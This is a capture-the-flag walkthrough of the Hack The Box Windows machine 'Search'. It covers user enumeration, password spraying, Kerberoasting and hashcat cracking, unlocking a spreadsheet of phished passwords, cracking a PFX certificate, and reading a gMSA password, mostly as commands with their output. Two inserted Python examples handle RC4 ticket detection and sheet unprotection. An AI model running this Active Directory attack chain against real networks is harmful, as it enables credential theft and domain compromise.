Hack-The-Box-walkthrough[search]

Introduction

OS: Windows
Difficulty: Hard
Points: 40
Release: 18 Dec 2021
IP: 10.10.11.129

  • my htb rank

Enumeration

NMAP

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.129
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-07 16:21:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
8172/tcp open ssl/http Microsoft IIS httpd 10.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49691/tcp open unknown
49704/tcp open msrpc Microsoft Windows RPC
49725/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap reveals a lot of open ports, most of them standard Windows / Active Directory services. Add the domain to the hosts file. Let’s look at the web first.

Nothing much is available on the web other than the team members’ names. Let’s add these names to a file and enumerate valid usernames.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# /root/kerbrute-master/kerbrute userenum user.txt -d search.htb --dc search.htb

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 01/07/22 - Ronnie Flathers @ropnop

2022/01/07 11:31:26 > Using KDC(s):
2022/01/07 11:31:26 > search.htb:88

2022/01/07 11:31:26 > [+] VALID USERNAME: Dax.Santiago@search.htb
2022/01/07 11:31:26 > [+] VALID USERNAME: Keely.Lyons@search.htb
2022/01/07 11:31:26 > [+] VALID USERNAME: Sierra.Frye@search.htb
2022/01/07 11:31:26 > Done! Tested 8 usernames (3 valid) in 0.235 seconds

Out of eight users, only three are valid. Let’s try to query the domain for users with ‘Do not require Kerberos pre-authentication’ set and export their TGTs for cracking.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# GetNPUsers.py search.htb/ -usersfile user.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[-] User Keely.Lyons@search.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Dax.Santiago@search.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Sierra.Frye@search.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

None of these accounts has ‘Do not require pre-auth’ set. This means we can’t perform an AS-REP roasting attack, which requires a user with pre-authentication disabled. We can’t dump LDAP without a valid password for a user, and there are no interesting directories to look into. However, there’s an image which has interesting information.

http://search.htb/images/slide_2.jpg

If we look at the August 17 date, it says ‘Send password to Hope Sharp’ and the password mentioned is IsolationIsKey?. We have the username and password of the Hope user. We can also try spraying this password against the recently found accounts.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# crackmapexec smb search.htb -u user.txt -p 'IsolationIsKey?' --shares
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Keely.Lyons@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Dax.Santiago@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Sierra.Frye@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Kyla.Stewart@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Kaiara.Spencer@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Dave.Simpson@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Ben.Thompson@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Chris.Stewart@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE

As you can see, this password is not valid for any of the users we found recently. Let’s try this password with the Hope user.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# crackmapexec smb search.htb -u Hope.Sharp -p 'IsolationIsKey?' --shares
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\Hope.Sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [+] Enumerated shares
SMB 10.10.11.129 445 RESEARCH Share Permissions Remark
SMB 10.10.11.129 445 RESEARCH ----- ----------- ------
SMB 10.10.11.129 445 RESEARCH ADMIN$ Remote Admin
SMB 10.10.11.129 445 RESEARCH C$ Default share
SMB 10.10.11.129 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB 10.10.11.129 445 RESEARCH helpdesk
SMB 10.10.11.129 445 RESEARCH IPC$ READ Remote IPC
SMB 10.10.11.129 445 RESEARCH NETLOGON READ Logon server share
SMB 10.10.11.129 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB 10.10.11.129 445 RESEARCH SYSVOL READ Logon server share

We have access to a couple of shared directories. Let’s look into them.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp
Enter WORKGROUP\Hope.Sharp's password:
Try "help" to get a list of possible commands.
smb: \> ls
. Dc 0 Fri Jan 7 11:46:39 2022
.. Dc 0 Fri Jan 7 11:46:39 2022
abril.suarez Dc 0 Tue Apr 7 14:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 09:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 08:35:32 2020
belen.compton Dc 0 Tue Apr 7 14:32:31 2020
Cameron.Melendez Dc 0 Fri Jul 31 08:37:36 2020
chanel.bell Dc 0 Tue Apr 7 14:15:09 2020
Claudia.Pugh Dc 0 Fri Jul 31 09:09:08 2020
Cortez.Hickman Dc 0 Fri Jul 31 08:02:04 2020
dax.santiago Dc 0 Tue Apr 7 14:20:08 2020
Eddie.Stevens Dc 0 Fri Jul 31 07:55:34 2020
edgar.jacobs Dc 0 Thu Apr 9 16:04:11 2020
Edith.Walls Dc 0 Fri Jul 31 08:39:50 2020
eve.galvan Dc 0 Tue Apr 7 14:23:13 2020
frederick.cuevas Dc 0 Tue Apr 7 14:29:22 2020
hope.sharp Dc 0 Thu Apr 9 10:34:41 2020
jayla.roberts Dc 0 Tue Apr 7 14:07:00 2020
Jordan.Gregory Dc 0 Fri Jul 31 09:01:06 2020
payton.harmon Dc 0 Thu Apr 9 16:11:39 2020
Reginald.Morton Dc 0 Fri Jul 31 07:44:32 2020
santino.benjamin Dc 0 Tue Apr 7 14:10:25 2020
Savanah.Velazquez Dc 0 Fri Jul 31 08:21:42 2020
sierra.frye Dc 0 Wed Nov 17 20:01:46 2021
trace.ryan Dc 0 Thu Apr 9 16:14:26 2020

3246079 blocks of size 4096. 458738 blocks available
smb: \>

More user information is present in this directory. Let’s add these names to the user.txt file. We can access Hope’s directory, but for the rest we don’t have permission to read or list the contents.

Now that we have a valid username and password, we can dump LDAP.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Windows-100.search.htb
INFO: Querying computer: Windows-99.search.htb
INFO: Querying computer: Windows-98.search.htb
INFO: Querying computer: Windows-97.search.htb
INFO: Querying computer: Windows-96.search.htb
INFO: Querying computer: Windows-95.search.htb
INFO: Querying computer: Windows-94.search.htb
INFO: Querying computer: Windows-93.search.htb
INFO: Querying computer: Windows-92.search.htb
INFO: Querying computer: Windows-91.search.htb
----------SNIP----------

We have a vhost (research.search.htb); let’s add that to the hosts file. Now we can visualize this dump using the BloodHound GUI. Upload all the dumped data.

This is the shortest path to domain admin. However, we don’t have access to any of the users who are members of ‘ITSEC’. We have access to the ‘Hope Sharp’ user, but she’s not a member of ITSEC. However, if we look for Kerberoastable accounts, we find two.

This ‘Web_svc’ account was created by HelpDesk and is temporary. It is used as a web service, so basically it is a service account.

The SPN is not null, so we can Kerberoast: request a service ticket for that SPN and extract the service account’s credential (the hash) from Active Directory as a regular user, without sending any packets to the target system.

  • Kerberoasting without SPNs

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 08:59:11.329031 <never>

$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$4ee5fdd7f42a0f84f9ac17f136b3f069$...

We got the hash of the web_svc service account. Let’s try to crack it.

hashcat.exe -m 13100 password.txt rockyou.txt

$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$4ee5fdd7f42a0f84f9ac17f136b3f069$...:@3ONEmillionbaby

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*...5ec2e1
Time.Started.....: Sat Jan 08 02:00:20 2022 (1 sec)
Time.Estimated...: Sat Jan 08 02:00:21 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14880.9 kH/s (9.10ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Speed.#3.........: 271.1 kH/s (13.03ms) @ Accel:32 Loops:1 Thr:8 Vec:1
Speed.#*.........: 15152.0 kH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 12828672/14344385 (89.43%)
Rejected.........: 0/12828672 (0.00%)
Restore.Point....: 11214848/14344385 (78.18%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: DR3KSILL0 -> 23~1~19
Candidates.#3....: 2380146112071401 -> 234tjg
Hardware.Mon.#1..: Temp: 59c Util: 29% Core: 528MHz Mem:2279MHz Bus:8
Hardware.Mon.#3..: N/A

Started: Sat Jan 08 01:59:54 2022
Stopped: Sat Jan 08 02:00:22 2022
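The reason the crack above finishes in a second is visible in the hash itself: the `23` after `$krb5tgs$` is etype 23 (RC4-HMAC), whose key is the unsalted NT hash. The following is an added example, not code from the walkthrough, that parses hashcat-style `$krb5tgs$` lines and flags accounts still issued RC4 tickets so they can be moved to AES; the sample lines are constructed (the page’s web_svc prefix with a fake, truncated ciphertext, and a made-up AES256 line in hashcat’s 19700 layout).

```python
"""Parse hashcat-style $krb5tgs$ lines and flag weak Kerberos encryption types.

Added example, not part of the original walkthrough.  SAMPLE_LINES are constructed.
"""
import re

# Encryption types (RFC 3961, RFC 6649) and whether they are weak for Kerberoasting.
# etype 23 (RC4-HMAC) uses the NT hash (one unsalted MD4 of the password) as the key,
# which is why hashcat reached ~15 MH/s above; etypes 17/18 derive the key with
# salted PBKDF2-HMAC-SHA1 (4096 iterations), so every guess costs far more.
ETYPES = {
    23: ("rc4-hmac", True),
    17: ("aes128-cts-hmac-sha1-96", False),
    18: ("aes256-cts-hmac-sha1-96", False),
}

# hashcat mode 13100 layout:       $krb5tgs$23$*user$REALM$spn*$checksum$edata
_RC4 = re.compile(
    r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$")
# hashcat mode 19600/19700 layout: $krb5tgs$17$user$REALM$checksum$edata
_AES = re.compile(
    r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$([0-9a-f]{24})\$([0-9a-f]+)$")


def parse_krb5tgs(line: str) -> dict:
    """Split one $krb5tgs$ line into its fields and add a 'weak' verdict."""
    line = line.strip()
    m = _RC4.match(line)
    if m:
        user, realm, spn, checksum, edata = m.groups()
        etype = 23
    else:
        m = _AES.match(line)
        if not m:
            raise ValueError("not a recognised $krb5tgs$ line")
        etype_s, user, realm, checksum, edata = m.groups()
        etype, spn = int(etype_s), None
    name, weak = ETYPES[etype]
    return {"etype": etype, "etype_name": name, "weak": weak, "user": user,
            "realm": realm, "spn": spn, "checksum": checksum,
            "ticket_bytes": len(edata) // 2}


def rc4_service_accounts(lines) -> list:
    """Accounts whose ticket used a weak etype: the ones to move to AES-only
    (msDS-SupportedEncryptionTypes) first."""
    return sorted({p["user"] for p in map(parse_krb5tgs, lines) if p["weak"]})


# Constructed samples: the page's web_svc prefix + fake ciphertext, and an AES line.
SAMPLE_LINES = [
    "$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*"
    "$4ee5fdd7f42a0f84f9ac17f136b3f069$" + "ab" * 32,
    "$krb5tgs$18$sql_svc$SEARCH.HTB$" + "cd" * 12 + "$" + "ef" * 32,
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        p = parse_krb5tgs(line)
        print(f"{p['user']:10} etype={p['etype']} ({p['etype_name']}) weak={p['weak']}")
    print("move to AES first:", rc4_service_accounts(SAMPLE_LINES))
```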

We got the password for the web_svc service account; let’s spray this password across all the accounts we have found so far.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# crackmapexec smb search.htb -u user.txt -p '@3ONEmillionbaby' --continue-on-success
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\abril.suarez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Angie.Duffy:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Antony.Russo:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\belen.compton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cameron.Melendez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\chanel.bell:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Claudia.Pugh:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cortez.Hickman:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\dax.santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Eddie.Stevens:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Edith.Walls:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\eve.galvan:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\frederick.cuevas:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hope.sharp:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\jayla.roberts:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Jordan.Gregory:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\payton.harmon:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Reginald.Morton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\santino.benjamin:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Savanah.Velazquez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\sierra.frye:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\trace.ryan:@3ONEmillionbaby STATUS_LOGON_FAILURE

One user account is using the same password as the service account. Let’s look into that user’s share.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs
Enter WORKGROUP\edgar.jacobs's password:
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> ls
. DRc 0 Mon Aug 10 06:02:16 2020
.. DRc 0 Mon Aug 10 06:02:16 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 16:05:29 2020
desktop.ini AHSc 282 Mon Aug 10 06:02:16 2020
Microsoft Edge.lnk Ac 1450 Thu Apr 9 16:05:03 2020
Phishing_Attempt.xlsx Ac 23130 Mon Aug 10 06:35:44 2020

3246079 blocks of size 4096. 458449 blocks available

There’s an XLSX file; download it to your machine.

This XLSX document has two sheets: one has passwords captured by phishing and the other has a list of usernames. As the lock symbol on the second sheet shows, a column is locked with a password.

You can confirm it by resizing the cell between lastname and Username. There are two ways to remove the password. Upload it to Google Drive and open it via Sheets; it will remove the password for you. This is the easiest way. If you want to remove it manually, unzip the xlsx file and delete the element below from the sheet2.xml file.

<sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg"
saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

You can find this ‘sheet2.xml’ file after unzipping the xlsx file, at xl/worksheets/sheet2.xml. Once you delete that element, you need to zip it back.

zip -r Phishing.xls .

Open the file and double-click the line between columns B and D to see the passwords.
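Sheet protection is a UI lock, not encryption: the hidden column is stored in plain XML whether or not the `sheetProtection` element is present. The following is an added example (not the walkthrough’s code) that automates the manual unzip / delete / re-zip steps above and shows the cell values are readable either way; the workbook it builds is a constructed, minimal zip with only the parts needed here, not a full Excel file.

```python
"""Strip <sheetProtection/> from an .xlsx and show the hidden column was never encrypted.

Added example, not the walkthrough's own code.  make_sample_xlsx() builds a constructed,
minimal workbook (enough for zipfile, not for Excel) whose sheet2.xml mirrors the page.
"""
import re
import zipfile
from io import BytesIO

SHEET = "xl/worksheets/sheet2.xml"
# The self-closing element the walkthrough deletes by hand (attributes may span lines).
PROTECTION = re.compile(r"<sheetProtection\b[^>]*/>")

# Constructed sample sheet: column C hidden and protected with SHA-512 + spinCount.
# Inline strings are used so no sharedStrings part is needed.
SAMPLE_SHEET2 = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
    '<sheetProtection algorithmName="SHA-512" hashValue="EXAMPLEHASH"\n'
    'saltValue="EXAMPLESALT" spinCount="100000" sheet="1" objects="1" scenarios="1"/>'
    '<cols><col min="3" max="3" hidden="1"/></cols>'
    '<sheetData><row r="2">'
    '<c r="A2" t="inlineStr"><is><t>Payton</t></is></c>'
    '<c r="C2" t="inlineStr"><is><t>password-goes-here</t></is></c>'
    '</row></sheetData></worksheet>'
)


def make_sample_xlsx() -> bytes:
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr(SHEET, SAMPLE_SHEET2)
    return buf.getvalue()


def is_protected(xlsx: bytes, sheet: str = SHEET) -> bool:
    with zipfile.ZipFile(BytesIO(xlsx)) as z:
        return PROTECTION.search(z.read(sheet).decode()) is not None


def strip_protection(xlsx: bytes, sheet: str = SHEET) -> bytes:
    """Rewrite the zip with <sheetProtection/> removed from `sheet`; every other
    part is copied unchanged (the zip container *is* the .xlsx)."""
    out = BytesIO()
    with zipfile.ZipFile(BytesIO(xlsx)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == sheet:
                data = PROTECTION.sub("", data.decode()).encode()
            dst.writestr(info.filename, data)
    return out.getvalue()


def cell_values(xlsx: bytes, sheet: str = SHEET) -> dict:
    """Read inline-string cells straight from the XML, ignoring protection and
    hidden columns: this is why sheet protection is not a confidentiality control."""
    with zipfile.ZipFile(BytesIO(xlsx)) as z:
        xml = z.read(sheet).decode()
    return dict(re.findall(r'<c r="([A-Z]+\d+)" t="inlineStr"><is><t>([^<]*)</t>', xml))


if __name__ == "__main__":
    locked = make_sample_xlsx()
    print("protected:", is_protected(locked), "values:", cell_values(locked))
    unlocked = strip_protection(locked)
    print("protected:", is_protected(unlocked), "values:", cell_values(unlocked))
```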

firstname  lastname  password                          Username
Payton     Harmon    ;;36!cried!INDIA!year!50;;        Payton.Harmon
Cortez     Hickman   ..10-time-TALK-proud-66..         Cortez.Hickman
Bobby      Wolf      ??47^before^WORLD^surprise^91??   Bobby.Wolf
Margaret   Robinson  //51+mountain+DEAR+noise+83//     Margaret.Robinson
Scarlett   Parks     ++47|building|WARSAW|gave|60++    Scarlett.Parks
Eliezer    Jordan    !!05_goes_SEVEN_offer_83!!        Eliezer.Jordan
Hunter     Kirby     ~~27%when%VILLAGE%full%00~~       Hunter.Kirby
Sierra     Frye      $$49=wide=STRAIGHT=jordan=28$$18  Sierra.Frye
Annabelle  Wells     ==95~pass~QUIET~austria~77==      Annabelle.Wells
Eve        Galvan    //61!banker!FANCY!measure!25//    Eve.Galvan
Jeramiah   Fritz     ??40:student:MAYOR:been:66??      Jeramiah.Fritz
Abby       Gonzalez  &&75:major:RADIO:state:93&&       Abby.Gonzalez
Joy        Costa     **30*venus*BALL*office*42**       Joy.Costa
Vincent    Sutton    **24&moment&BRAZIL&members&66**   Vincent.Sutton

Now we have 15 more usernames and passwords. If we look at the BloodHound visual path to domain admin, only two of those users are in the password list: Abby and Sierra lead to domain admin. Abby’s password didn’t work, but Sierra’s did.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
Enter WORKGROUP\Sierra.Frye's password:
Try "help" to get a list of possible commands.
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> ls
. DRc 0 Wed Nov 17 20:08:00 2021
.. DRc 0 Wed Nov 17 20:08:00 2021
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 282 Fri Jul 31 10:42:15 2020
Microsoft Edge.lnk Ac 1450 Tue Apr 7 08:28:05 2020
user.txt Ac 33 Wed Nov 17 19:55:27 2021

3246079 blocks of size 4096. 458293 blocks available
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# cat user.txt
5c7b277e24c9c5a866f572bdff53f0f4

We have the user flag now.

smb: \sierra.frye\Desktop\> cd \sierra.frye\Downloads\Backups\
smb: \sierra.frye\Downloads\Backups\> ls
. DHc 0 Mon Aug 10 16:39:17 2020
.. DHc 0 Mon Aug 10 16:39:17 2020
search-RESEARCH-CA.p12 Ac 2643 Fri Jul 31 11:04:11 2020
staff.pfx Ac 4326 Mon Aug 10 16:39:17 2020

3246079 blocks of size 4096. 458293 blocks available

Under Downloads\Backups we find two certificate files. Let’s download them to our machine.

smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12
getting file \sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 of size 2643 as search-RESEARCH-CA.p12 (1.7 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
getting file \sierra.frye\Downloads\Backups\staff.pfx of size 4326 as staff.pfx (5.6 KiloBytes/sec) (average 2.2 KiloBytes/sec)

A .p12 file is a PKCS#12 (Public Key Cryptography Standard #12) archive: a password-protected container used as a portable format for transferring a certificate together with its private key and other sensitive material. P12 files are used by various security and encryption programs and are generally referred to as “PFX files”.

We can try to import this certificate into the browser (Firefox).

It asks for a password. We can try to crack the password using the tool below.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# /root/p12tool/p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt

██████╗ ██╗██████╗ ████████╗ ██████╗ ██████╗ ██╗
██╔══██╗███║╚════██╗╚══██╔══╝██╔═══██╗██╔═══██╗██║
██████╔╝╚██║ █████╔╝ ██║ ██║ ██║██║ ██║██║
██╔═══╝ ██║██╔═══╝ ██║ ██║ ██║██║ ██║██║
██║ ██║███████╗ ██║ ╚██████╔╝╚██████╔╝███████╗
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝

Version: 1.0 (n/a) - 01/07/22 - Evi1cg

2022/01/07 15:42:12 -> [*] Brute forcing...
2022/01/07 15:42:12 -> [*] Start thread num 100
2022/01/07 15:42:12 -> [+] Password found ==> misspissy
2022/01/07 15:42:12 -> [*] Successfully cracked password after 5484391 attempts!

If you are on a VM, this will take much longer. Now we have the password for the certificate. Let’s add it to our browser.

There’s a specific endpoint which you can access with this certificate.

https://search.htb/staff/en-US/logon.aspx

Now we need to enter the credentials of the ‘Sierra’ user and access the PowerShell console.

Sierra.Frye
$$49=wide=STRAIGHT=jordan=28$$18
research.search.htb

After logging in we can run PowerShell commands.

Let’s go back to BloodHound and look for a path from the owned principals to domain admin.

As Sierra is a member of ITSEC, we can read the gMSA password.

BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can retrieve the password for the gMSA BIR-ADFS-GMSA@SEARCH.HTB.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# python3 /root/gMSADumper-main/gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

gMSAs use 240-byte, randomly generated complex passwords, so cracking the hash is not practical.

  • Reading GMSA Password

  • Passwordless PowerShell - How to use gMSAs In Your Scripts

  • GMSA Attributes in the Active Directory

msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) - stores the security principals that can access the GMSA password.
msds-ManagedPassword - This attribute contains a BLOB with password information for group-managed service accounts.
msDS-ManagedPasswordId - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
msDS-ManagedPasswordInterval - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.

Based on both of these blogs, we can run commands as BIR-ADFS-GMSA$ and set up an environment from which to reach domain admin.

# Get-ADServiceAccount comes from the ActiveDirectory module;
# ConvertFrom-ADManagedPasswordBlob comes from the DSInternals module.
$user = 'BIR-ADFS-GMSA$'
# Read the msDS-ManagedPassword blob; only principals listed in msDS-GroupMSAMembership (here ITSEC) may read it
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
# Decode the blob into its current/previous password and rotation intervals
$mp = ConvertFrom-ADManagedPasswordBlob $blob
# Build a credential for the gMSA from the decoded current password
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword

With the above we retrieve the gMSA password and set it up so we can run commands as the ‘BIR-ADFS-GMSA$’ user.
